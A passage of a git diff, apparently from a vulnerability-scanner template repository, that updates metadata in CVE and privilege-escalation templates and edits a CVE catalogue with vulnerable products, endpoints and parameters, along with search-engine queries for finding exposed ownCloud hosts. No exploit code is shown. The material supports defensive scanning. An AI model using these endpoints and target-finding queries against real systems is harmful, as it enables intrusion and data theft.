490a0046304402202d82e21007ea9d2f9d609d5737dc4073c578f37b06b0023c12b39024ed7b63c302203b740c9bff84e6e2e21d0edf1cde2ed9dc4d878a5bf35e6080edfe32cb24fee0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index bad214eb39..562acae7b3 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure,fuzz,enum + tags: cloud,cloud-enum,azure,fuzz,enum,dns self-contained: true @@ -63,5 +63,4 @@ dns: part: answer words: - "IN\tA" - -# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210098b015215646fc57a33bf05ec1cd3363b21d9f635738f80193fab1edb1eb41c5022029c97c1df1d99734a1b67093023f2540fc877695c84573d61d3072c6167572ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 30b7130474..edcebf7516 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical + tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project self-contained: true code: @@ -47,4 +47,4 @@ code: - '!contains(code_1_response, "root")' - 'contains(code_2_response, "root")' condition: and -# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c6a17c6dcfa5e1c0705af985ede699d418ae7488b1f1a1d29faf8b7dcc7e8920220008d95bc160ad21eb5224ab61a5f4ffc0c7ae1d1b6513f4add54a8e1624df386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index b92022c2ba..82ea2ae00b 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev + tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project self-contained: true code: @@ -40,4 +40,4 @@ code: - "malloc(): memory corruption" - "Aborted (core dumped)" condition: and -# digest: 4a0a0047304502204de6d29ee97c296f1046225fd664237cb80c163370f316bfa2c0174718fa0654022100cbd49f46b75314934af75dde946dbe4a3d135d87368f2dead3b9b2fa40bb839b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0e1b0f8d02b42918c0845dc5e5d78fc1c8d9a16120a30c0607392239fd7acc1022000b3670974ad0b3ae3912068b5315a610b9a2e6028401acf310cc430a4d9facc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 26688faba5..37c78d8cfb 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -29,6 +29,7 @@ info: max-request: 2 vendor: canonical product: ubuntu_linux + shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux" tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical self-contained: true @@ -54,4 +55,4 @@ code: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and -# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f71ea7f284c92f61ede41dec7bf632da2b6f19950112c01dc700e8ad877d5e6e0221009569eafc6aacde58eeb2243f2af58f3e80fc23ae5631b894d03b5a17be1d7201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 4c28f685ab..25c98ac3c4 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -17,14 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49105 cwe-id: CWE-287 - epss-score: 0.21237 - epss-percentile: 0.96302 + epss-score: 0.18166 + epss-percentile: 0.96172 cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: owncloud product: owncloud - shodan-query: title:"owncloud" + shodan-query: + - title:"owncloud" + - http.title:"owncloud" + fofa-query: title="owncloud" + google-query: intitle:"owncloud" tags: cve,cve2023,code,owncloud,auth-bypass variables: username: admin @@ -86,4 +90,4 @@ http: - type: dsl dsl: - '"Username => "+ username' -# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd75893be6bdbdd291261de98eaaf9655419b306536c647069f97bc6b71ddbe2022029ba873b1e50b5a01e59c18aaa95b53a8217ef58ccec9e655b60d8dfc63259eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index d96f5b0e87..daf66317e9 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev,gnu self-contained: true code: @@ -39,4 +39,4 @@ code: - type: word words: - "139" # Segmentation Fault Exit Code -# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d08133fa6531aad4e00eb212908470e14839334ed5db3de00407ea2cee249660220021a38d5d167fb379028d9c9f8fecd46d3360fd546c566ad3767be0e9913cca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index e7a19e0257..2543b9f1dd 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,linux,privesc,local + tags: cve,cve2023,code,glibc,linux,privesc,local,gnu self-contained: true code: @@ -39,4 +39,4 @@ code: - type: word words: - "127" # Segmentation Fault Exit Code -# digest: 490a0046304402204e884ed16aed759a6b31c001e50ee4aed4db45f060d3335e1b6f28935eae4135022051929119a0bf2eac944500d98af2720a6ff835dcb875f35cc6390fbdf47c8bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a919cd26f6c36adc91930b301d7861d1049bb0bc1222498a4f3115bc53ff10a022100954ecf5dc41c3dad43fb10d639f353368aed51b849f59d1b23462b1a02ab86a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2024/CVE-2024-3094.yaml b/code/cves/2024/CVE-2024-3094.yaml index 413ca3d822..42576af2c0 100644 --- a/code/cves/2024/CVE-2024-3094.yaml +++ b/code/cves/2024/CVE-2024-3094.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: tukaani product: xz - tags: cve,cve2024,local,code,xz,backdoor + tags: cve,cve2024,local,code,xz,backdoor,tukaani self-contained: true code: @@ -59,4 +59,4 @@ code: - type: dsl dsl: - response -# digest: 4b0a00483046022100ac6864410c93e586885b4473cebffd245bb5c0448e7ece0ab162f92f0ecfe4f302210092315c5373e9393c838e7b5e78d7dbc755ccaf673efdb536ec799630299352e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff27fd00a95152d34d7bfd96983b912ed0539184f94ee57f0fc4446451a0536402203929b77426326e3cb6baa2e5afcf3bdf3cf73bd93195f7ed2432dede184b3ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml index 82bc981104..f98605822c 100644 --- a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml +++ b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 3 - tags: code,linux,sqlite3,privesc,local + tags: code,linux,sqlite3,privesc,local,sqli self-contained: true code: @@ -46,4 +46,4 @@ code: - 'contains(code_2_response, "root")' - 'contains(code_3_response, "root")' condition: or -# digest: 4a0a00473045022022a00ad1518880dc881748fd331a8f7a3c599927934d342c7221c5ecccd445c1022100cff484fd929a67261efcef2917d8976308c8062ca11652d78b36b40c195c08aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa56cf60985d9b7af0481de9704b276f7dfb4729c6247f40e41e195c36dbfe51022100a36990c84dd3cc92747016bf36d3c1eb1fddbec3e40c312393abde1d75d1489f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cves.json b/cves.json index b5bbba72c0..dc2254fad5 100644 --- a/cves.json +++ b/cves.json @@ -500,7 +500,7 @@ {"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10818.yaml"} {"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10822.yaml"} {"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10823.yaml"} -{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"} +{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"} {"ID":"CVE-2018-10956","Info":{"Name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","Severity":"high","Description":"IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10956.yaml"} {"ID":"CVE-2018-11227","Info":{"Name":"Monstra CMS \u003c=3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-11227.yaml"} {"ID":"CVE-2018-11231","Info":{"Name":"Opencart Divido - Sql Injection","Severity":"high","Description":"OpenCart Divido plugin is susceptible to SQL injection\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-11231.yaml"} @@ -1372,6 +1372,8 @@ {"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"} {"ID":"CVE-2021-37704","Info":{"Name":"phpfastcache - phpinfo Resource Exposure","Severity":"medium","Description":"phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2021/CVE-2021-37704.yaml"} {"ID":"CVE-2021-37833","Info":{"Name":"Hotel Druid 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37833.yaml"} +{"ID":"CVE-2021-38146","Info":{"Name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","Severity":"high","Description":"The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-38146.yaml"} +{"ID":"CVE-2021-38147","Info":{"Name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","Severity":"high","Description":"Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-38147.yaml"} {"ID":"CVE-2021-38314","Info":{"Name":"WordPress Redux Framework \u003c=4.2.11 - Information Disclosure","Severity":"medium","Description":"WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-38314.yaml"} {"ID":"CVE-2021-38540","Info":{"Name":"Apache Airflow - Unauthenticated Variable Import","Severity":"critical","Description":"Apache Airflow Airflow \u003e=2.0.0 and \u003c2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-38540.yaml"} {"ID":"CVE-2021-38647","Info":{"Name":"Microsoft Open Management Infrastructure - Remote Code Execution","Severity":"critical","Description":"Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-38647.yaml"} @@ -1550,6 +1552,7 @@ {"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"} {"ID":"CVE-2022-0658","Info":{"Name":"CommonsBooking \u003c 2.6.8 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0658.yaml"} {"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"} +{"ID":"CVE-2022-0666","Info":{"Name":"Microweber \u003c 1.2.11 - CRLF Injection","Severity":"high","Description":"CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0666.yaml"} {"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"} {"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"} {"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0692.yaml"} @@ -1607,6 +1610,7 @@ {"ID":"CVE-2022-1439","Info":{"Name":"Microweber \u003c1.2.15 - Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1439.yaml"} {"ID":"CVE-2022-1442","Info":{"Name":"WordPress Metform \u003c=2.1.3 - Information Disclosure","Severity":"high","Description":"WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1442.yaml"} {"ID":"CVE-2022-1574","Info":{"Name":"WordPress HTML2WP \u003c=1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1574.yaml"} +{"ID":"CVE-2022-1580","Info":{"Name":"Site Offline WP Plugin \u003c 1.5.3 - Authorization Bypass","Severity":"medium","Description":"The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2022/CVE-2022-1580.yaml"} {"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"} {"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"} {"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"} @@ -1787,7 +1791,6 @@ {"ID":"CVE-2022-31846","Info":{"Name":"WAVLINK WN535 G3 - Information Disclosure","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31846.yaml"} {"ID":"CVE-2022-31847","Info":{"Name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","Severity":"high","Description":"WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-31847.yaml"} {"ID":"CVE-2022-31854","Info":{"Name":"Codoforum 5.1 - Arbitrary File Upload","Severity":"high","Description":"Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31854.yaml"} -{"ID":"CVE-2022-31879","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-31879.yaml"} {"ID":"CVE-2022-31974","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports\u0026date=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31974.yaml"} {"ID":"CVE-2022-31975","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"high","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user\u0026id=.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-31975.yaml"} {"ID":"CVE-2022-31976","Info":{"Name":"Online Fire Reporting System v1.0 - SQL injection","Severity":"critical","Description":"Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-31976.yaml"} @@ -1830,6 +1833,7 @@ {"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"} {"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"} {"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"} +{"ID":"CVE-2022-34534","Info":{"Name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","Severity":"high","Description":"Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34534.yaml"} {"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"} {"ID":"CVE-2022-34590","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-34590.yaml"} {"ID":"CVE-2022-34753","Info":{"Name":"SpaceLogic C-Bus Home Controller \u003c=1.31.460 - Remote Command Execution","Severity":"high","Description":"SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-34753.yaml"} @@ -2015,11 +2019,12 @@ {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} {"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"} {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} -{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"high","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} +{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"critical","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} {"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected 